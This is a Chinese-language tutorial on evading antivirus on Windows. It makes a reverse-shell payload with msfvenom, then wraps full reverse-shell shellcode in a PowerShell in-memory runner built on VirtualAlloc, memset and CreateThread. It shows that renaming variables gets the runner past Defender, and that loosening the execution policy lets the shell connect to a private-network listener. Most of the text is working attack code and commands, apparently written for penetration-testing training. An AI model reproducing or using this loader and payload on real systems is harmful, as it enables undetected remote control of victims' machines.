防毒軟體規避

 防毒軟體規避

列出一個檔案的 SHA 256 HASH 指令

└─$ sha256sum post.txt   

列出一個檔案的二進制與 ASCII 格式使用 xxd 指令

└─$ xxd -b post.txt                          

透過 msfvenom 包一個 reverse shell 的 exe payload，檔名為 binary.exe

└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.228 LPORT=4444 -f exe > binary.exe

將檔案 COPY 到裝有 Defender 的 Windows 系統會馬上跳出如下的告警

判定為 Trojan 木馬後門程式並直接隔離無法使用

上傳到 VirusTotal 也是偵測出為木馬後門程式

接著來手動作一個 PowerShell PS 腳本如下

===================================================================

$code = '

[DllImport("kernel32.dll")]

public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

[DllImport("kernel32.dll")]

public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

[DllImport("msvcrt.dll")]

public static extern IntPtr memset(IntPtr dest, uint src, uint count);';

$winFunc = 

  Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;

[Byte[]];

[Byte[]]$sc = <place your shellcode here>;

$size = 0x1000;

if ($sc.Length -gt 0x1000) {$size = $sc.Length};

$x = $winFunc::VirtualAlloc(0,$size,0x3000,0x40);

for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};

$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };

===================================================================

該腳本首先從 kernel32.dll 導入VirtualAlloc 和 CreateThread

然後從 msvcrt.dll 導入 memset，這些函數允許分配內存、創建執行線程以及將任意數據寫入分配的內存。此為在當前進程 (powershell.exe) 中分配內存並執行一個新線程，而不是遠程線程。

=====================================================================

[DllImport("kernel32.dll")]

public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

[DllImport("kernel32.dll")]

public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

[DllImport("msvcrt.dll")]

public static extern IntPtr memset(IntPtr dest, uint src, uint count);';

======================================================================

腳本主要邏輯首先使用 VirtualAlloc 分配一個內存塊，該內存塊獲取存儲在 $sc 字節數組中的有效 Payload 的每個字節，並使用 memset 將其寫入新分配的內存塊。

=======================================================================

[Byte[]]$sc = <place your shellcode here>;

$size = 0x1000;

if ($sc.Length -gt 0x1000) {$size = $sc.Length};

$x = $winFunc::VirtualAlloc(0,$size,0x3000,0x40);

for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};

========================================================================

最後一行在內存中寫入的有效 Payload 是使用 CreateThread API 在單獨的線程中執行的

=================================================

$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };

=================================================

接著要來產生整個 PowerShell 當中的 Payload, 這裡用到的是直接輸出為 SC 格式

└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.228 LPORT=4444 -f powershell -v sc

msfvenom payload 生成好網頁 https://www.pa55w0rd.online/msfvenom%20_use/ 

Offsec 官方介紹 https://www.offsec.com/metasploit-unleashed/msfvenom/

將 SC 輸出的格式貼上到原本 PowerShell 腳本中的 $sc 變數

=======================================================================

[Byte[]] $sc = 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52,0x14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd,0x1,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1,0x51,0x8b,0x59,0x20,0x1,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xff,0xac,0xc1,0xcf,0xd,0x1,0xc7,0x38,0xe0,0x75,0xf6,0x3,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0x1c,0x1,0xd3,0x8b,0x4,0x8b,0x1,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x0,0x0,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x7,0xff,0xd5,0xb8,0x90,0x1,0x0,0x0,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x0,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x5,0x68,0xc0,0xa8,0x2d,0xe4,0x68,0x2,0x0,0x11,0x5c,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0xc,0xff,0x4e,0x8,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x68,0x63,0x6d,0x64,0x0,0x89,0xe3,0x57,0x57,0x57,0x31,0xf6,0x6a,0x12,0x59,0x56,0xe2,0xfd,0x66,0xc7,0x44,0x24,0x3c,0x1,0x1,0x8d,0x44,0x24,0x10,0xc6,0x0,0x44,0x54,0x50,0x56,0x56,0x56,0x46,0x56,0x4e,0x56,0x56,0x53,0x56,0x68,0x79,0xcc,0x3f,0x86,0xff,0xd5,0x89,0xe0,0x4e,0x56,0x46,0xff,0x30,0x68,0x8,0x87,0x1d,0x60,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x6,0x7c,0xa,0x80,0xfb,0xe0,0x75,0x5,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x0,0x53,0xff,0xd5

======================================================================= 

將結果存成 PS1 標準腳本，執行後被防毒軟體直接掃掉

將名稱做一些異動修改 $winFunc --> $var2

$sc --> $var1

名稱從 Win32 -->  iWin32

現在連防毒都掃不到了

測試執行 PS1 拿 Reverse Shell 時發現無法正常執行

查看當前使用者的策略 Get-ExecutionPolicy -Scope CurrentUser

發現是 Undefined 沒有定義所以無法執行

透過 Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser

將 Policy 改成沒有限制，套用到 All User 再 Get 一次就發現沒有限制了

再執行一次就看到 Reverse Shell 進來了